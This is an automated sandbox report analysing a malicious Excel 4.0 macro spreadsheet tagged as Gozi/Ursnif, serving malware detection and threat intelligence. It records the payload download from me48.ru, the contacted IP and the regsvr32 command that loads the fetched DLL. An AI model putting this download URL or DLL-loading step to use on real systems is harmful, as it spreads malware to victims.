Loading ...

Play interactive tourEdit tour

Analysis Report document-1444032431.xls

Overview

General Information

Sample Name:document-1444032431.xls
Analysis ID:324312
MD5:407b70bcaef4d41cc7f63ceb6412a692
SHA1:2cc134d5c5ea93bbbb0212f8d692484cc76766bd
SHA256:6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1296 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1444032431.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1444032431.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 532, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 1296

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1444032431.xlsVirustotal: Detection: 35%Perma Link
    Source: document-1444032431.xlsReversingLabs: Detection: 44%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: global trafficDNS query: name: me48.ru
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.225.24.87:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.225.24.87:80
    Source: Joe Sandbox ViewIP Address: 188.225.24.87 188.225.24.87
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: me48.ruConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: me48.ruConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: me48.ru
    Source: document-1444032431.xlsString found in binary or memory: http://me48.ru/ds/231120.gif
    Source: regsvr32.exe, 00000003.00000002.2091881653.0000000001D40000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: CALL
    Source: document-1444032431.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1444032431.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1444032431.xlsOLE indicator, VBA macros: true
    Source: document-1444032431.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\DADE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD143.tmpJump to behavior
    Source: document-1444032431.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1444032431.xlsVirustotal: Detection: 35%
    Source: document-1444032431.xlsReversingLabs: Detection: 44%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1444032431.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1444032431.xls35%VirustotalBrowse
    document-1444032431.xls14%MetadefenderBrowse
    document-1444032431.xls45%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    me48.ru1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    me48.ru
    188.225.24.87
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://me48.ru/ds/231120.giffalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2091881653.0000000001D40000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    188.225.24.87
    unknownRussian Federation
    9123TIMEWEB-ASRUfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324312
    Start date:29.11.2020
    Start time:05:40:34
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 13m 24s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:document-1444032431.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/5@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Max analysis timeout: 720s exceeded, the analysis took too long
    • Exclude process from analysis (whitelisted): dllhost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    188.225.24.87document-1421190491.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1421190491.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1473929595.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1473929595.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1484980114.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1493705687.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1484980114.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1493705687.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1495480491.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1495480491.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1466663902.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1466663902.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1470167594.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1470167594.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1470686903.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1470686903.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1500762737.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1500762737.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1474276477.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif
    document-1474276477.xlsGet hashmaliciousBrowse
    • me48.ru/ds/231120.gif

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    me48.rudocument-1421190491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1421190491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1473929595.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1473929595.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1484980114.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1493705687.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1484980114.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1493705687.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1495480491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1495480491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1466663902.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1466663902.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470167594.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470167594.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470686903.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470686903.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1500762737.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1500762737.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1474276477.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1474276477.xlsGet hashmaliciousBrowse
    • 188.225.24.87

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    TIMEWEB-ASRUdocument-1421190491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1421190491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1473929595.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1473929595.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1484980114.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1493705687.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1484980114.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1493705687.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1495480491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1495480491.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1466663902.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1466663902.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470167594.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470167594.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470686903.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1470686903.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1500762737.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1500762737.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1474276477.xlsGet hashmaliciousBrowse
    • 188.225.24.87
    document-1474276477.xlsGet hashmaliciousBrowse
    • 188.225.24.87

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\19DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):315324
    Entropy (8bit):7.9856492764520395
    Encrypted:false
    SSDEEP:6144:6lKAurFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MA:64ZFPM8R3AsB+bjej/9c9
    MD5:5098DB7E9AC876AB80BB13F0D199EC54
    SHA1:87C89FAE6CB09A5F2E25763EDAB3641E22D2AF59
    SHA-256:1AC9B9774C12D533CF6B3F80B78251CDE6A12E62A6DC09AE9C0D20EE9C02C1F0
    SHA-512:DA95A8C9419C5194F3A17D9541E11F79589FE23452C064D825DC7BCA9B6557E9CA1FFD0A9DBC445BB876B8FB4F2C7947266DE40B4CF9BD3BE146D9196240DC87
    Malicious:false
    Reputation:low
    Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 12:41:41 2020, atime=Sun Nov 29 12:41:41 2020, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.457557297615232
    Encrypted:false
    SSDEEP:12:85QwCLgXg/XAlCPCHaXgzB8IB/HMFvX+WnicvbQlbDtZ3YilMMEpxRljKPCTdJP8:85vU/XTwz6I5KvYeMZDv3q/rNru/
    MD5:85449AD9E39559AAA2913C3D5B75E8EE
    SHA1:71D1C8D27C92927E3C27BF9736684F85F27A876E
    SHA-256:D504FF974585C6C76E4C5F994446B5B18BDE5E36C844C924F909116642ADCE81
    SHA-512:DCF943CA81EC86612B5516113DA3E4FC8742B9CCEB6848A1FAA9C92DD40D0B9B0813E1B303B5AA7259308F031F371CB128C1498FE14E2ADA6EF661BE4AD79D4D
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G....l^U.....l^U.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q5m..Desktop.d......QK.X}Q5m*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1444032431.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Nov 29 12:41:41 2020, atime=Sun Nov 29 12:41:41 2020, length=338432, window=hide
    Category:dropped
    Size (bytes):4236
    Entropy (8bit):4.49891639780458
    Encrypted:false
    SSDEEP:96:86aM/XLIn6iUviU6/Qh26aM/XLIn6iUviU6/Qh26aM/XLIn6iUviU6/Qh26aM/X3:84In6faQE4In6faQE4In6faQE4In6fag
    MD5:B80D975D047F1AA4279B0549D4D95960
    SHA1:0F2DB5792F52E1C1ED1496DF04BADB84357BCF27
    SHA-256:B6825E1117B6C8D7A00E14ECBDA9DF62D22B930CA0438A901624B5DA4D5944D8
    SHA-512:963D7829032FD42B95FE4FB26BAC942232AF99F507A92E8A2A5809F24CCC11B548BFC0FEDD81CBCC164BD8AE1806A8A7693F632F31045D00EF5977DE8FBA21ED
    Malicious:false
    Reputation:low
    Preview: L..................F.... ...c....{....l^U.....s^U....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..,..}Q2m .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.4.4.0.3.2.4.3.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\document-1444032431.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.4.4.0.3.2.4.3.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N.
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):232
    Entropy (8bit):4.58632424408481
    Encrypted:false
    SSDEEP:6:dj6Y9L1VQvgEL1VQvUY9L1VQvgEL1VQvUY9L1VQvgEL1VQvUY9L1VQvs:dmW0t0UW0t0UW0t0UW0s
    MD5:3CEB26C40FD0AC18ECC71A36D42E6078
    SHA1:CAA999B067964E45D41696DD53A6D78878ACA641
    SHA-256:DD55EE5394A013AA69EAF59F7DB71C967225A96396171A9C0DD1D9700315A36B
    SHA-512:06A791BC30754741CFE9D56BCF747020F71819CA14CAE78CBDF34F7419F1B14DA4BCDB474C5348D3C21673259621306BB7EC436A9D8AA4A55440AB4AD8EA761D
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..
    C:\Users\user\Desktop\DADE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Applesoft BASIC program data, first line number 16
    Category:dropped
    Size (bytes):398377
    Entropy (8bit):7.195263540214216
    Encrypted:false
    SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdm:Oizo8RnsIROnr6n75Y+X
    MD5:50D06354B55088E6C4857F8788A9FBA1
    SHA1:86B6DF0209A857191D16A100EA7E82923A872983
    SHA-256:8357E554575E759A89D792830F6B6593A2F579C78A6C9C208026DE0C79EAD2EE
    SHA-512:27D1A70B281869C1A9F497247926DCCB1CD29DED5A522B54E199FBA12897872B8E2E8F581F0BF2BDC3A36F8C5401617C0473B5CDA9B371620D6CE12FC5C9756D
    Malicious:false
    Reputation:low
